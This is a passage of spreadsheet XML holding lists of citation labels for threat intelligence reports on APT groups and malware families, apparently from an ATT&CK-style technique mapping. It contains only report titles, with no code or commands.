2017),(Citation: Intrinsec Egregor Nov 2020),(Citation: Dell TG-3390),(Citation: Cisco Talos Bitter Bangladesh May 2022),(Citation: Proofpoint TA459 April 2017),(Citation: NCSC APT29 July 2020),(Citation: Dell Sakula),(Citation: GitHub Pupy),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Unit 42 OilRig Sept 2018),(Citation: Securelist Octopus Oct 2018),(Citation: Symantec Orangeworm IOCs April 2018),(Citation: Malwarebytes Kimsuky June 2021),(Citation: TrendMicro TropicTrooper 2015),(Citation: Kaspersky WIRTE November 2021),(Citation: Accenture Lyceum Targets November 2021),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: Intezer Doki July 20),(Citation: Accenture HyperStack October 2020),(Citation: Citizen Lab Stealth Falcon May 2016),(Citation: Malwarebytes Pony April 2016),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Check Point APT35 CharmPower January 2022),(Citation: CrowdStrike IceApple May 2022),(Citation: Forcepoint Felismus Mar 2017),(Citation: Talos Lokibot Jan 2021),(Citation: Proofpoint TA505 October 2019),(Citation: Qualys LolZarus),(Citation: FireEye APT10 April 2017),(Citation: Talos PoetRAT October 2020),(Citation: NTT Security Flagpro new December 2021),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: Checkpoint IndigoZebra July 2021),(Citation: Cybersecurity Advisory SVR TTP May 2021),(Citation: NCC Group Team9 June 2020),(Citation: FireEye SUNBURST Backdoor December 2020),(Citation: Accenture Hogfish April 2018),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Aqua Kinsing April 2020),(Citation: ClearSky MuddyWater June 2019),(Citation: SentinelOne Lazarus macOS July 2020),(Citation: Talos Konni May 2017),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Unit42 RDAT July 2020),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Antiy CERT Ramsay April 2020),(Citation: TrendMicro BlackTech June 2017),(Citation: Recorded Future REDDELTA July 2020),(Citation: Bitdefender Naikon April 2021),(Citation: CheckPoint Volatile Cedar March 2015),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: BitDefender Chafer May 2020),(Citation: S2 Grupo TrickBot June 2017),(Citation: Sofacy DealersChoice),(Citation: Kaspersky Regin),(Citation: Talos Cobalt Strike September 2020),(Citation: Juniper IcedID June 2020),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Cybereason Chaes Nov 2020),(Citation: Medium Eli Salem GuLoader April 2021),(Citation: Securelist LuckyMouse June 2018),(Citation: SecureWorks August 2019),(Citation: Group IB GrimAgent July 2021),(Citation: Microsoft PLATINUM April 2016),(Citation: Symantec Vasport May 2012),(Citation: FireEye APT28),(Citation: PaloAlto DNS Requests May 2016),(Citation: DigiTrust Agent Tesla Jan 2017),(Citation: Lotus Blossom Jun 2015),(Citation: Scarlet Mimic Jan 2016),(Citation: Unit42 Cannon Nov 2018),(Citation: ESET Casbaneiro Oct 2019),(Citation: BlackBerry Bahamut),(Citation: TrendMicro Gamaredon April 2020),(Citation: ESET Sednit Part 2),(Citation: Talos GravityRAT),(Citation: Rewterz Sidewinder COVID-19 June 2020),(Citation: ProofPoint Ursnif Aug 2016),(Citation: Symantec Dyre June 2015),(Citation: Unit 42 Gamaredon February 2022),(Citation: ClearSky Siamesekitten August 2021),(Citation: Kaspersky Turla),(Citation: FireEye FiveHands April 2021),(Citation: Kaspersky ProjectSauron Full Report),(Citation: TrendMicro Ursnif Mar 2015),(Citation: CrowdStrike Grim Spider May 2019),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Malwarebytes Saint Bot April 2021),(Citation: CrowdStrike StellarParticle January 2022),(Citation: synack 2016 review),(Citation: CISA SoreFang July 2016),(Citation: Guidepoint SUPERNOVA Dec 2020),(Citation: F-Secure Cosmicduke),(Citation: CISA AppleJeus Feb 2021),(Citation: Unit 42 BackConfig May 2020),(Citation: Malwarebytes Konni Aug 2021),(Citation: IBM Grandoreiro April 2020),(Citation: Fortinet Diavol July 2021),(Citation: Unit 42 NOKKI Sept 2018),(Citation: Kaspersky Turla Aug 2014),(Citation: Symantec Elfin Mar 2019),(Citation: Symantec Shuckworm January 2022),(Citation: FireEye SMOKEDHAM June 2021),(Citation: CrowdStrike Putter Panda),(Citation: FoxIT Wocao December 2019),(Citation: ESET Okrum July 2019),(Citation: Unit42 Molerat Mar 2020),(Citation: FireEye Hacking FIN4 Video Dec 2014),(Citation: Proofpoint TA505 Mar 2018),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: cobaltstrike manual),(Citation: Uptycs Confucius APT Jan 2021),(Citation: F-Secure CozyDuke),(Citation: Trend Micro DRBControl February 2020),(Citation: Morphisec ShellTea June 2019),(Citation: Kaspersky Sofacy),(Citation: Trustwave GoldenSpy June 2020),(Citation: Cisco Talos Intelligence Group),(Citation: Microsoft GALLIUM December 2019),(Citation: NSA/FBI Drovorub August 2020),(Citation: Medium Metamorfo Apr 2020),(Citation: Medium S2W WhisperGate January 2022),(Citation: ThreatStream Evasion Analysis),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Unit42 Redaman January 2019),(Citation: Forcepoint BITTER Pakistan Oct 2016),(Citation: TrendMicro macOS Dacls May 2020),(Citation: ESET Twitter Ida Pro Nov 2021),(Citation: Malwarebytes DarkComet March 2018),(Citation: CISA ComRAT Oct 2020),(Citation: ESET Machete July 2019),(Citation: Cyphort EvilBunny Dec 2014),(Citation: Zscaler Higaisa 2020),(Citation: Unit42 Emissary Panda May 2019),(Citation: ESET Turla Mosquito Jan 2018),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Microsoft NICKEL December 2021),(Citation: Crowdstrike Qakbot October 2020),(Citation: ObjectiveSee AppleJeus 2019),(Citation: Unit 42 PingPull Jun 2022),(Citation: FireEye Hacking FIN4 Dec 2014),(Citation: DHS CISA AA22-055A MuddyWater February 2022),(Citation: FireEye EPS Awakens Part 2),(Citation: Kaspersky CactusPete Aug 2020),(Citation: PaloAlto Patchwork Mar 2018),(Citation: Anomali MUSTANG PANDA October 2019),(Citation: Talos Micropsia June 2017),(Citation: FireEye Fin8 May 2016),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: Proofpoint ZeroT Feb 2017),(Citation: Microsoft HAFNIUM March 2020),(Citation: PaloAlto UBoatRAT Nov 2017),(Citation: Trend Micro IXESHE 2012),(Citation: Microsoft Actinium February 2022),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: BlackBerry Amadey 2020),(Citation: FOX-IT May 2016 Mofang),(Citation: Trend Micro Muddy Water March 2021),(Citation: Proofpoint NETWIRE December 2020),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: Securelist Remexi Jan 2019),(Citation: Unit 42 RGDoor Jan 2018),(Citation: Radware Micropsia July 2018),(Citation: Palo Alto Shamoon Nov 2016),(Citation: Talos TinyTurla September 2021),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: Infoblox Lokibot January 2019),</t>
  </si>
  <si>
    <t>(Citation: ESET InvisiMole June 2018),(Citation: Secureworks Karagany July 2019),(Citation: Carbon Black HotCroissant April 2020),(Citation: NTT Security Flagpro new December 2021),(Citation: Novetta Blockbuster),(Citation: Novetta Blockbuster Tools),(Citation: FireEye APT32 May 2017),(Citation: Talos ROKRAT),(Citation: Symantec W32.Duqu),(Citation: Symantec Catchamas April 2018),(Citation: Fortinet Metamorfo Feb 2020),(Citation: Red Canary NETWIRE January 2020),(Citation: ESET Grandoreiro April 2020),(Citation: CheckPoint Naikon May 2020),(Citation: Prevailion DarkWatchman 2021),(Citation: ESET Machete July 2019),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Novetta Blockbuster Loaders),(Citation: SecureWorks August 2019),(Citation: Unit 42 Kazuar May 2017),(Citation: Kaspersky NetTraveler),(Citation: ATT QakBot April 2021),(Citation: Symantec Darkmoon Aug 2005),(Citation: Fidelis njRAT June 2013),(Citation: Securelist Remexi Jan 2019),(Citation: FireEye APT37 Feb 2018),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Volexity PowerDuke November 2016),(Citation: ESET InvisiMole June 2020),(Citation: ESET Attor Oct 2019),(Citation: FireEye Metamorfo Apr 2018),(Citation: Symantec Chafer Dec 2015),(Citation: TrendMicro BlackTech June 2017),</t>
  </si>
  <si>
    <t>(Citation: Trustwave Pillowmint June 2020),(Citation: CISA AA21-200A APT40 July 2021),(Citation: CISA WellMail July 2020),(Citation: DOJ APT10 Dec 2018),(Citation: District Court of NY APT10 Indictment December 2018),(Citation: Novetta Blockbuster RATs),(Citation: FireEye FELIXROOT July 2018),(Citation: ESET OceanLotus Mar 2019),(Citation: CISA Zebrocy Oct 2020),(Citation: KISA Operation Muzabi),(Citation: ESET Lazarus Jun 2020),(Citation: ESET LightNeuron May 2019),(Citation: Cybereason PowerLess February 2022),(Citation: Malwarebytes Konni Aug 2021),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Talos Agent Tesla Oct 2018),(Citation: trendmicro xcsset xcode project 2020),(Citation: CISA MAR-10288834-2.v1  TAINTEDSCRIBE MAY 2020),(Citation: Novetta-Axiom),(Citation: ESET Sednit Part 2),(Citation: McAfee Gold Dragon),(Citation: Red Canary NETWIRE January 2020),(Citation: objsee mac malware 2017),(Citation: GitHub Bloodhound),(Citation: Github PowerShell Empire),(Citation: Cybereason Bumblebee August 2022),(Citation: ESET Gelsemium June 2021),(Citation: CheckPoint Naikon May 2020),(Citation: FireEye FIN6 April 2016),(Citation: ESET ForSSHe December 2018),(Citation: ESET Machete July 2019),(Citation: Kaspersky Turla Aug 2014),(Citation: ESET Operation Groundbait),(Citation: Novetta Blockbuster Loaders),(Citation: FOX-IT May 2016 Mofang),(Citation: Symantec Chafer Dec 2015),(Citation: Kaspersky Turla),(Citation: Villeneuve 2011),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: ESET TeleBots Oct 2018),(Citation: Securelist Sofacy Feb 2018),(Citation: TrendMicro Patchwork Dec 2017),(Citation: Securelist Dtrack),(Citation: Securelist Remexi Jan 2019),(Citation: US-CERT TA18-074A),(Citation: BiZone Lizar May 2021),(Citation: Symantec Tick Apr 2016),(Citation: DOJ GRU Indictment Jul 2018),(Citation: Symantec Dragonfly),(Citation: ESET Zebrocy Nov 2018),(Citation: Fortinet Emotet May 2017),(Citation: McAfee Lazarus Resurfaces Feb 2018),</t>
  </si>
  <si>
    <t>(Citation: ESET InvisiMole June 2018),(Citation: Palo Alto Reaver Nov 2017),(Citation: Visa RawPOS March 2015),(Citation: Talos Promethium June 2020),(Citation: Avira Mustang Panda January 2020),(Citation: FireEye NETWIRE March 2019),(Citation: Novetta Blockbuster RATs),(Citation: Symantec W.32 Stuxnet Dossier),(Citation: Eset Ramsay May 2020),(Citation: Novetta Blockbuster),(Citation: ThreatExpert Agent.btz),(Citation: FireEye MESSAGETAP October 2019),(Citation: Palo Alto T9000 Feb 2016),(Citation: Symantec W32.Duqu),(Citation: ESET Sednit Part 2),(Citation: ZScaler Squirrelwaffle Sep 2021),(Citation: FireEye APT30),(Citation: Trend Micro FIN6 October 2019),(Citation: TrendMicro MacOS April 2018),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: FireEye FIN6 April 2016),(Citation: ESET Machete July 2019),(Citation: Novetta Blockbuster Loaders),(Citation: Mandiant UNC3890 Aug 2022),(Citation: Volexity InkySquid BLUELIGHT August 2021),(Citation: SentinelOne FrameworkPOS September 2019),(Citation: MSTIC FoggyWeb September 2021),(Citation: ESET Okrum July 2019),(Citation: FireEye HAWKBALL Jun 2019),(Citation: Unit 42 RGDoor Jan 2018),(Citation: McAfee Sharpshooter December 2018),(Citation: Trend Micro MacOS Backdoor November 2020),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: BlackBerry CostaRicto November 2020),(Citation: Bitdefender StrongPity June 2020),(Citation: CopyKittens Nov 2015),(Citation: TrendMicro RawPOS April 2015),(Citation: Securelist Kimsuky Sept 2013),(Citation: ESET Attor Oct 2019),(Citation: Dell TG-3390),(Citation: McAfee Lazarus Resurfaces Feb 2018),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky TajMahal April 2019),(Citation: ESET InvisiMole June 2018),(Citation: Cylance Dust Storm),(Citation: Kaspersky Turla Aug 2014),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Novetta Blockbuster RATs),(Citation: Securelist Denis April 2017),(Citation: Mandiant No Easy Breach),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Palo Alto Networks BBSRAT),(Citation: ESET InvisiMole June 2020),(Citation: Accenture MUDCARP March 2019),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: MSTIC FoggyWeb September 2021),</t>
  </si>
  <si>
    <t>(Citation: Symantec Calisto July 2018),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: ESET InvisiMole June 2018),(Citation: Cycraft Chimera April 2020),(Citation: GitHub PoshC2),(Citation: Avira Mustang Panda January 2020),(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021),(Citation: GitHub Pupy),(Citation: Morphisec ShellTea June 2019),(Citation: Eset Ramsay May 2020),(Citation: Symantec Cicada November 2020),(Citation: CrowdStrike AQUATIC PANDA December 2021),(Citation: Microsoft GALLIUM December 2019),(Citation: Symantec MuddyWater Dec 2018),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Cybereason Soft Cell June 2019),(Citation: Malwarebytes Kimsuky June 2021),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Mandiant APT1),(Citation: PWC Cloud Hopper April 2017),(Citation: Securelist Calisto July 2018),(Citation: FireEye APT41 Aug 2019),(Citation: Talos Kimsuky Nov 2021),(Citation: Symantec Sowbug Nov 2017),(Citation: Talos PoetRAT April 2020),(Citation: aptsim),(Citation: TrendMicro EarthLusca 2022),(Citation: Microsoft HAFNIUM March 2020),(Citation: Trend Micro Tick November 2019),(Citation: FireEye APT35 2018),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: ESET Crutch December 2020),(Citation: Kaspersky MoleRATs April 2019),(Citation: Volexity SolarWinds),(Citation: Rclone),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: ESET Nomadic Octopus 2018),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: FireEye Know Your Enemy FIN8 Aug 2016),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: McAfee Honeybee),(Citation: Symantec Elfin Mar 2019),(Citation: Symantec Waterbug Jun 2019),(Citation: FireEye APT39 Jan 2019),(Citation: Microsoft Deep Dive Solorigate January 2021),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: CISA AA20-259A Iran-Based Actor September 2020),(Citation: FoxIT Wocao December 2019),(Citation: ClearSky Wilted Tulip July 2017),(Citation: ESET Okrum July 2019),(Citation: Volexity Exchange Marauder March 2021),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Radware Micropsia July 2018),(Citation: FireEye APT37 Feb 2018),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: CrowdStrike StellarParticle January 2022),(Citation: Symantec Tick Apr 2016),(Citation: Microsoft NICKEL December 2021),(Citation: Symantec Gallmaker Oct 2018),(Citation: Antiy CERT Ramsay April 2020),(Citation: CrowdStrike IceApple May 2022),(Citation: objective-see windtail2 jan 2019),(Citation: objsee mac malware 2017),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: QiAnXin APT-C-36 Feb2019),(Citation: Kaspersky TajMahal April 2019),(Citation: ESET InvisiMole June 2018),(Citation: Cofense RevengeRAT Feb 2019),(Citation: Cylance Shaheen Nov 2018),(Citation: Zscaler Cobian Aug 2017),(Citation: GitHub Pupy),(Citation: 360 Machete Sep 2020),(Citation: DigiTrust NanoCore Jan 2017),(Citation: Cylance Machete Mar 2017),(Citation: EFF Manul Aug 2016),(Citation: Palo Alto T9000 Feb 2016),(Citation: Kaspersky Flame),(Citation: Unit 42 VERMIN Jan 2018),(Citation: Unit 42 Nokki Oct 2018),(Citation: PaloAlto NanoCore Feb 2016),(Citation: Objective-See MacMa Nov 2021),(Citation: Fortinet Remcos Feb 2017),(Citation: Securelist ScarCruft May 2019),(Citation: objsee mac malware 2017),(Citation: f-secure janicab),(Citation: Malwarebytes DarkComet March 2018),(Citation: Kaspersky Adwind Feb 2016),(Citation: Securelist Machete Aug 2014),(Citation: Imminent Unit42 Dec2019),(Citation: Kaspersky Flame Functionality),(Citation: TrendMicro DarkComet Sept 2014),(Citation: FireEye Periscope March 2018),(Citation: PowerSploit Documentation),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Radware Micropsia July 2018),(Citation: FireEye APT37 Feb 2018),(Citation: Janicab),(Citation: GitHub PowerSploit May 2012),(Citation: ESET InvisiMole June 2020),(Citation: ESET Attor Oct 2019),(Citation: Symantec Chafer Dec 2015),(Citation: Kaspersky Transparent Tribe August 2020),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky TajMahal April 2019),(Citation: ESET InvisiMole June 2018),(Citation: GitHub PoshC2),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: McAfee GhostSecret),(Citation: Eset Ramsay May 2020),(Citation: KISA Operation Muzabi),(Citation: Symantec Cicada November 2020),(Citation: Palo Alto Comnie),(Citation: SecureWorks BRONZE UNION June 2017),(Citation: FireEye MESSAGETAP October 2019),(Citation: ESET Zebrocy May 2019),(Citation: ESET LightNeuron May 2019),(Citation: Palo Alto T9000 Feb 2016),(Citation: Secureworks BRONZE PRESIDENT December 2019),(Citation: Unit 42 VERMIN Jan 2018),(Citation: FireEye Metamorfo Apr 2018),(Citation: Mandiant APT1),(Citation: MSTIC NOBELIUM Mar 2021),(Citation: Roadtools),(Citation: Talos PoetRAT April 2020),(Citation: Red Canary NETWIRE January 2020),(Citation: Unit42 Redaman January 2019),(Citation: Trend Micro FIN6 October 2019),(Citation: ESET Crutch December 2020),(Citation: ESET Sednit USBStealer 2014),(Citation: Mythc Documentation),(Citation: FireEye FIN6 April 2016),(Citation: ATT Sidewinder January 2021),(Citation: TrendMicro Confucius APT Aug 2021),(Citation: FOX-IT May 2016 Mofang),(Citation: ESET RTM Feb 2017),(Citation: Palo Alto OilRig May 2016),(Citation: Unit 42 Playbook Dec 2017),(Citation: FoxIT Wocao December 2019),(Citation: TrendMicro Patchwork Dec 2017),(Citation: McAfee Bankshot),(Citation: SentinelOne Valak June 2020),(Citation: Radware Micropsia July 2018),(Citation: Mandiant FIN5 GrrCON Oct 2016),(Citation: Bitdefender StrongPity June 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: ESET Gamaredon June 2020),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Microsoft NICKEL December 2021),(Citation: DOJ GRU Indictment Jul 2018),(Citation: ESET InvisiMole June 2020),(Citation: objective-see windtail2 jan 2019),(Citation: ESET Attor Oct 2019),(Citation: ESET Zebrocy Nov 2018),(Citation: Palo Alto Rover),(Citation: Talos Frankenstein June 2019),(Citation: NCC Group Chimera January 2021),</t>
  </si>
  <si>
    <t>(Citation: Kaspersky TajMahal April 2019),(Citation: Talos Promethium June 2020),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: ESET Windigo Mar 2014),(Citation: F-Secure Cosmicduke),(Citation: ESET LightNeuron May 2019),(Citation: ESET Crutch December 2020),(Citation: ESET Sednit USBStealer 2014),(Citation: ESET Machete July 2019),(Citation: ATT Sidewinder January 2021),(Citation: FOX-IT May 2016 Mofang),(Citation: Intezer Doki July 20),(Citation: Bitdefender StrongPity June 2020),(Citation: ESET Gamaredon June 2020),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Microsoft NICKEL December 2021),(Citation: Forcepoint Monsoon),(Citation: ESET Attor Oct 2019),(Citation: Palo Alto Rover),(Citation: Talos Frankenstein June 2019),</t>
  </si>
  <si>
    <t>(Citation: FireEye Periscope March 2018),(Citation: Unit 42 BackConfig May 2020),(Citation: Talos Cobalt Strike September 2020),(Citation: TrendMicro Tropic Trooper Mar 2018),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Microsoft PLATINUM April 2016),(Citation: NCC Group Team9 June 2020),(Citation: CobaltStrike Scripted Web Delivery),(Citation: Group IB Ransomware September 2020),(Citation: FireEye APT41 March 2020),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: FBI FLASH APT39 September 2020),(Citation: Intrinsec Egregor Nov 2020),(Citation: Kaspersky Ferocious Kitten Jun 2021),(Citation: PaloAlto UBoatRAT Nov 2017),(Citation: Microsoft BITS),(Citation: Symantec BITS May 2007)</t>
  </si>
  <si>
    <t>(Citation: Checkpoint IndigoZebra July 2021),(Citation: Securelist Dtrack),(Citation: Cylance Dust Storm),</t>
  </si>
  <si>
    <t>(Citation: FireEye Regsvr32 Targeting Mongolian Gov),(Citation: Microsoft PoisonIvy 2017),(Citation: paloalto Tropic Trooper 2016),</t>
  </si>
  <si>
    <t>(Citation: Crysys Skywiper),(Citation: Graeber 2014),(Citation: Microsoft Configure LSA)</t>
  </si>
  <si>
    <t>(Citation: Trend Micro Skidmap),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: NSA/FBI Drovorub August 2020),(Citation: Wikibooks Grsecurity),(Citation: Apple TN2459 Kernel Extensions),(Citation: SourceForge rkhunter),(Citation: MDMProfileConfigMacOS),(Citation: Kernel.org Restrict Kernel Module),(Citation: Kernel Self Protection Project),(Citation: Increasing Linux kernel integrity),(Citation: Chkrootkit Main),(Citation: LKM loading kernel restrictions)</t>
  </si>
  <si>
    <t>(Citation: Microsoft SIR Vol 21),(Citation: Microsoft Wingbird Nov 2017),(Citation: Symantec Pasam May 2012),(Citation: Microsoft DLL Security),(Citation: Microsoft Enable Cred Guard April 2017),(Citation: Microsoft Credential Guard April 2017),(Citation: Microsoft LSA Protection Mar 2014)</t>
  </si>
  <si>
    <t>(Citation: Objective See Green Lambert for OSX Oct 2021),(Citation: Glitch-Cat Green Lambert ATTCK Oct 2021),(Citation: Red Canary NETWIRE January 2020),(Citation: hexed osx.dok analysis 2019),</t>
  </si>
  <si>
    <t>(Citation: ESET Gelsemium June 2021),(Citation: TrendMicro EarthLusca 2022),(Citation: ESET PipeMon May 2020),</t>
  </si>
  <si>
    <t>,(Citation: Re-Open windows on Mac)</t>
  </si>
  <si>
    <t>(Citation: PaloAlto DNS Requests May 2016),(Citation: Palo Alto Reaver Nov 2017),(Citation: ESET EvilNum July 2020),(Citation: Secureworks Karagany July 2019),(Citation: Nccgroup Emissary Panda May 2018),(Citation: Lotus Blossom Jun 2015),(Citation: Carbon Black HotCroissant April 2020),(Citation: ATT TeamTNT Chimaera September 2020),(Citation: ESET OceanLotus Mar 2019),(Citation: KISA Operation Muzabi),(Citation: Symantec Briba May 2012),(Citation: Cybereason Molerats Dec 2020),(Citation: Trend Micro njRAT 2018),(Citation: Anomali Evasive Maneuvers July 2015),(Citation: Prevailion EvilNum May 2020),(Citation: Unit 42 DarkHydrus July 2018),(Citation: ESET Casbaneiro Oct 2019),(Citation: Baumgartner Naikon 2015),(Citation: BlackBerry Bahamut),(Citation: Trend Micro Qakbot May 2020),(Citation: Unit 42 Nokki Oct 2018),(Citation: TrendMicro Gamaredon April 2020),(Citation: ESET Sednit Part 2),(Citation: McAfee Gold Dragon),(Citation: F-Secure BlackEnergy 2014),(Citation: Talos PoetRAT April 2020),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: Rewterz Sidewinder COVID-19 June 2020),(Citation: MalwareBytes SideCopy Dec 2021),(Citation: Crowdstrike Indrik November 2018),(Citation: Rewterz Sidewinder APT April 2020),(Citation: Carbon Black JCry May 2019),(Citation: ESET Gelsemium June 2021),(Citation: FireEye APT33 Guardrail),(Citation: Lazarus APT January 2022),(Citation: Proofpoint LookBack Malware Aug 2019),(Citation: Microsoft FinFisher March 2018),(Citation: Zscaler Kasidet),(Citation: fsecure NanHaiShu July 2016),(Citation: Malwarebytes SmokeLoader 2016),(Citation: GitHub SILENTTRINITY Modules July 2019),(Citation: Secureworks MCMD July 2019),(Citation: Securelist WhiteBear Aug 2017),(Citation: NCC Group APT15 Alive and Strong),(Citation: TrendMicro Taidoor),(Citation: Crowdstrike GTR2020 Mar 2020),(Citation: TrendMicro PE_URSNIF.A2),(Citation: ESET RTM Feb 2017),(Citation: Unit 42 BadPatch Oct 2017),(Citation: Cylance Cleaver),(Citation: Symantec Darkmoon Aug 2005),(Citation: Fidelis njRAT June 2013),(Citation: FireEye Periscope March 2018),(Citation: PowerSploit Documentation),(Citation: Trend Micro Qakbot December 2020),(Citation: US-CERT TA18-074A),(Citation: Malwarebytes Saint Bot April 2021),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: ESET Gamaredon June 2020),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: CopyKittens Nov 2015),(Citation: Volexity PowerDuke November 2016),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: McAfee Netwire Mar 2015),(Citation: Talos MuddyWater Jan 2022),(Citation: FireEye Hancitor),(Citation: Talos Oblique RAT March 2021),(Citation: FireEye Metamorfo Apr 2018),(Citation: Nccgroup Gh0st April 2018),(Citation: SentinelLabs Agent Tesla Aug 2020),(Citation: Talos Promethium June 2020),(Citation: Cybereason Oceanlotus May 2017),(Citation: Deep Instinct TA505 Apr 2019),(Citation: ZScaler Hacking Team),(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 ),(Citation: Dell Sakula),(Citation: Mandiant No Easy Breach),(Citation: Zscaler Cobian Aug 2017),(Citation: GitHub Pupy),(Citation: Trend Micro Conficker),(Citation: MSTIC Nobelium Toolset May 2021),(Citation: Cylance Machete Mar 2017),(Citation: Palo Alto Comnie),(Citation: Proofpoint TA416 November 2020),(Citation: Profero APT27 December 2020),(Citation: Securelist Octopus Oct 2018),(Citation: Reaqta MuddyWater November 2017),(Citation: Malwarebytes Kimsuky June 2021),(Citation: Symantec Emotet Jul 2018),(Citation: Talos Bisonal Mar 2020),(Citation: IBM Grandoreiro April 2020),(Citation: CyberBit Early Bird Apr 2018),(Citation: Github PowerShell Empire),(Citation: Talos Rocke August 2018),(Citation: Cybereason Bazar July 2020),(Citation: Cisco DNSMessenger March 2017),(Citation: Arxiv Avaddon Feb 2021),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: NCSC GCHQ Small Sieve Jan 2022),(Citation: Unit 42 NOKKI Sept 2018),(Citation: Secureworks BRONZE BUTLER Oct 2017),(Citation: FireEye FIN6 April 2016),(Citation: Kaspersky Darkhotel),(Citation: Bitdefender APT28 Dec 2015),(Citation: ESET Operation Groundbait),(Citation: Novetta Winnti April 2015),(Citation: Symantec Elfin Mar 2019),(Citation: Unit 42 Magic Hound Feb 2017),(Citation: Lastline PlugX Analysis),(Citation: FireEye APT39 Jan 2019),(Citation: FireEye SMOKEDHAM June 2021),(Citation: Proofpoint Leviathan Oct 2017),(Citation: CrowdStrike Putter Panda),(Citation: TrendMicro DarkComet Sept 2014),(Citation: TrendMicro Patchwork Dec 2017),(Citation: ClearSky Wilted Tulip July 2017),(Citation: ESET Okrum July 2019),(Citation: Rancor Unit42 June 2018),(Citation: Zscaler Lyceum DnsSystem June 2022),(Citation: Cylance Dust Storm),(Citation: IBM TA505 April 2020),(Citation: Unit42 Xbash Sept 2018),(Citation: Microsoft Kasidet),(Citation: FireEye FIN7 Aug 2018),(Citation: Unit42 BabyShark Feb 2019),(Citation: Accenture Dragonfish Jan 2018),(Citation: FireEye APT37 Feb 2018),(Citation: FireEye APT41 March 2020),(Citation: FireEye MuddyWater Mar 2018),(Citation: Palo Alto Gamaredon Feb 2017),(Citation: Cyble Sidewinder September 2020),(Citation: Kaspersky Cloud Atlas December 2014),(Citation: ESET Zebrocy Nov 2018),(Citation: ESET Sednit Part 1),(Citation: Palo Alto Rover),(Citation: Uptycs Confucius APT Jan 2021),(Citation: FireEye FIN7 April 2017),(Citation: Kaspersky Transparent Tribe August 2020),(Citation: FireEye Operation Double Tap),(Citation: F-Secure CozyDuke),(Citation: Proofpoint TA505 October 2019),(Citation: FireEye APT10 April 2017),(Citation: Trend Micro DRBControl February 2020),(Citation: Proofpoint Operation Transparent Tribe March 2016),(Citation: Novetta Blockbuster RATs),(Citation: Cylance Shaheen Nov 2018),(Citation: FinFisher Citation),(Citation: Morphisec ShellTea June 2019),(Citation: Kaspersky Sofacy),(Citation: CrowdStrike Ryuk January 2019),(Citation: NTT Security Flagpro new December 2021),(Citation: Unit 42 Lucifer June 2020),(Citation: Gigamon Berserk Bear October 2021),(Citation: Trend Micro Iron Tiger April 2021),(Citation: Accenture SNAKEMACKEREL Nov 2018),(Citation: Malwarebytes Higaisa 2020),(Citation: ESET Zebrocy May 2019),(Citation: Medium Metamorfo Apr 2020),(Citation: SentinelOne Aoqin Dragon June 2022),(Citation: ThreatStream Evasion Analysis),(Citation: NCC Group Team9 June 2020),(Citation: Microsoft Win Defender Truvasys Sep 2017),(Citation: Talos Group123),(Citation: Accenture Hogfish April 2018),(Citation: Fortinet Remcos Feb 2017),(Citation: Group IB Cobalt Aug 2017),(Citation: PaloAlto CardinalRat Apr 2017),(Citation: Talos Kimsuky Nov 2021),(Citation: Unit 42 NETWIRE April 2020),(Citation: Red Canary NETWIRE January 2020),(Citation: FireEye APT30),(Citation: Emissary Trojan Feb 2016),(Citation: Trend Micro Tick November 2019),(Citation: ESET Grandoreiro April 2020),(Citation: Kaspersky ThreatNeedle Feb 2021),(Citation: ESET 